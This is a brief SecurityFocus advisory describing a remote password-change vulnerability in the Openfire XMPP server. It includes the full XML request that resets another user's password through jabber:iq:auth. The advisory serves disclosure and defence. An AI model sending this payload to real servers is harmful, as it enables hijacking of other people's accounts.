Openfire jabber:iq:auth 'passwd_change' Remote Password Change Vulnerability

The following example data is sufficient to trigger this issue:

<iq type='set' id='passwd_change'>
<query xmlns='jabber:iq:auth'>
<username>test2</username>
<password>newillegalychangedpassword</password>
</query>
</iq>


 

Privacy Statement
Copyright 2010, SecurityFocus